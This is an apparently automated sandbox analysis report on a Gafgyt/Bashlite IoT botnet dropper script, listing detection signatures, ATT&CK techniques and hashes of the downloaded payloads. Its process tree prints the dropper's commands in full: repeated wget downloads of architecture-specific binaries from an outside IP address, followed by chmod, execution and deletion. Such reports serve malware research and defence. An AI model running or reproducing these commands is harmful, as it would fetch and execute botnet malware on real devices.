Analysis
-
max time kernel
150s -
max time network
152s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
-
submitted
03-01-2025 04:35
General
-
Target
cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7.sh
-
Size
1KB
-
MD5
c393be1bb1bbee668b95b671620d63c0
-
SHA1
cce8f8abadfd7e5b74d20a8bce40468662e3ffa9
-
SHA256
cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7
-
SHA512
9bfc5bf1c69d34605942daa875afebd493047c715009639302aac56256abfe6619ba37715dcb493f137329517181c7d3ebbcfb1395ad5ac3ae7bec360c20f721
Malware Config
Signatures
-
Detected Gafgyt variant 10 IoCs
-
Gafgyt family
-
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 10 IoCs
-
Changes its process name 3 IoCs
-
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7.sh/tmp/cdf836341472a8e4a991f003f2c6f42cef1d3da82640755ab2ab2cadb47da3a7.sh1⤵
-
/usr/bin/wgetwget http://31.13.224.110/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x mips2⤵
- File and Directory Permissions Modification
-
-
/tmp/mips./mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://31.13.224.110/mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x mipsel2⤵
- File and Directory Permissions Modification
-
-
/tmp/mipsel./mipsel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
-
/bin/rmrm -rf mipsel2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://31.13.224.110/sh42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x sh42⤵
- File and Directory Permissions Modification
-
-
/tmp/sh4./sh42⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf sh42⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/x862⤵
-
-
/bin/chmodchmod +x x862⤵
- File and Directory Permissions Modification
-
-
/tmp/x86./x862⤵
-
-
/bin/rmrm -rf x862⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/arm612⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x arm612⤵
- File and Directory Permissions Modification
-
-
/tmp/arm61./arm612⤵
- Executes dropped EXE
- Changes its process name
-
-
/bin/rmrm -rf arm612⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/i6862⤵
-
-
/bin/chmodchmod +x i6862⤵
- File and Directory Permissions Modification
-
-
/tmp/i686./i6862⤵
-
-
/bin/rmrm -rf i6862⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/ppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x ppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/ppc./ppc2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf ppc2⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/5862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x 5862⤵
- File and Directory Permissions Modification
-
-
/tmp/586./5862⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf 5862⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/m68k2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x m68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/m68k./m68k2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf m68k2⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/dc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x dc2⤵
- File and Directory Permissions Modification
-
-
/tmp/dc./dc2⤵
- Executes dropped EXE
-
-
/bin/rmrm -rf dc2⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/dss2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x dss2⤵
- File and Directory Permissions Modification
-
-
/tmp/dss./dss2⤵
- Executes dropped EXE
- Changes its process name
-
-
/bin/rmrm -rf dss2⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/co2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x co2⤵
- File and Directory Permissions Modification
-
-
/tmp/co./co2⤵
- Executes dropped EXE
- Changes its process name
-
-
/bin/rmrm -rf co2⤵
-
-
/usr/bin/wgetwget http://31.13.224.110/scar2⤵
-
-
/bin/chmodchmod +x scar2⤵
- File and Directory Permissions Modification
-
-
/tmp/scar./scar2⤵
-
-
/bin/rmrm -rf scar2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD5c61c82ec02a70a7dfc67f05e58ac836d
SHA164f47fe6aaf1e4190ea5bfdef94175178397a6c7
SHA2561de70cafe7cea0a83673f5341d9437b09a2814e2dfef819f73775f06836d9097
SHA51211d91cbbb15ef45b45d58d0e080acb7f247f50ffe3c68abd6fb94a0a7eeb1f41ee98feac5822973a228e2c22c50f1043406e909be69f3cef7f7affe98169785c
-
Filesize
136KB
MD5cc2c559dcf0b6b8a969dfe141afcb8a7
SHA19a51751c74638501f9bc94ee0070d61fb8c952c3
SHA256fbafa6393f825b6da94ea2b5517d759ff46564f563dba155f17a277683d75e1c
SHA512aba1ad2c7d1e51c3c98d2704e58e92accff328df23dfa0b2a219fd8e3775af8ba2e93157765da943f1c49721ecba6340fb46691112deb841a9cafc0f4a10432b
-
Filesize
117KB
MD5816c9789085d1dc828c5bc15f4b324c9
SHA16fa1a20a949f5cac73c11f2ec9402599dc8b1068
SHA256c35e6ac5fe1aaf98f735c8dfe3a5374b21dbd1e772c29a26ec37ae2e94c0fe8f
SHA5124902a7bbc1d3f89384ba87d8ac23e77b3aa8040d50d65826199ce878f2c5c868689b48cfb67642c2f660a0a1e9ade67e535e6fba931daaceaf8f9f39e4c395e0
-
Filesize
123KB
MD5a7ea51483786a5e5aacfa23a2347ea0b
SHA1e243c9f52a3c774e275ba53befa655abd4feb2e0
SHA256594319e3765373231c25d88092ffda29e2d0837c1c8d34ea2a407560e9df61a1
SHA512a88f9c4f3c2e639d394f5378704f6f8929fa5e03e9410c330294440bf99e640fa1de8c0edb1abfc79f4762e101745773236c8a50085fe6e7b787ff04fb6c18ba
-
Filesize
124KB
MD5a06d3fcd811e5560ca040e3891682bfb
SHA11e9bb2c23ccde930efe57c52fafaa07ac2450f1b
SHA256937c59d1e4a9cfabaf6210253757bb2fe9d07398d34f99c0871d3b10da2929f5
SHA512369338d59acc4861a2dd36591d4ab9cc43c7cadbbbc9c0fb002d7c30225b902f7937f046e5c2990b9c62491ad835ffb2a6aa68d9f5ffddeec829e91db1bf7364
-
Filesize
111KB
MD5638c9d3db4a55412b60783a2b692d469
SHA18fdb065fa1abf5c959f47518f920025d2707e381
SHA2564beede57ee08715bccefe5a287e7a5b7ca4d1a6a3d11f7c8cf6e47cbd62a4361
SHA51277edfaa825acfb5b1532f9e21972be603ed0f6a1ca908ef6964f701b371a9f0dd465b1ba4ea9a2f7496d345d34e1e0d9c4e89116c71d62b2867df57200ed3e61
-
Filesize
148KB
MD5dce29bdff1efd8b56470beb84800f340
SHA129744f0f8a1bfb02606d00b5eafd029b6006e9aa
SHA256ff80f728ab5574dd193e529d4cb4c5a062d7f57bea0de856722f6373e0235d60
SHA512967c004b6341f97572cef3aba4baf5b5346aaa4c8d9731a21c8dfd9994d9f65895f8946235f7103f51888a442827f8b3675642686167cb99d5062f4d3cbcd651
-
Filesize
148KB
MD5085aaca192395078f3266ad40ca3820e
SHA1391c2a7bbd936e9de7c33ff8c31858a4a120fa54
SHA25689ef04dea955b2724b47529801174a1a00b0533db594178efbb5888d37a87474
SHA51215e98139c7bc0551bf6eb5dbdb07b5de07fe01b3e4a5ace72918adb1e36e071d0d3e606a8019c58e1275f4e57f2b0ece8dbdd58de4cb5f9f30512013fea6db0e
-
Filesize
110KB
MD501a92f4cda4ed8855ba45ade51ee70b2
SHA1a6b61a2b34500929b548657556c29d91896d0a08
SHA2560c82739271f51c1040662ebc13805a749ac51c44e5355d60fb9fe1764efa2415
SHA512cf44cacfcd1d0361757b4216334bdd3e9d5b8045ec48303c2e191cfc2fb8807744a0b382b078ad3225ae3c36f2d168aa4aa2abeebc58d9a30ed2882b6807506e
-
Filesize
105KB
MD5488d96eefc3e512cad6dbf9ead797b9d
SHA1dc2352927d0928b2de6304bc1fd81332f35eebf4
SHA256e4bbb9fb66fc81dd445f598147810ea8d76eb4799a79561403c0902bb192ad45
SHA5129b9ae7893c692c3ffb679b47e2fcac3e3334d3f590ae026bf7c10122586a2a5e400a19ce4e414a4afe6f10da61dc2bbd0a14686cd48d6ea2d5e90d7a8bbe2ef9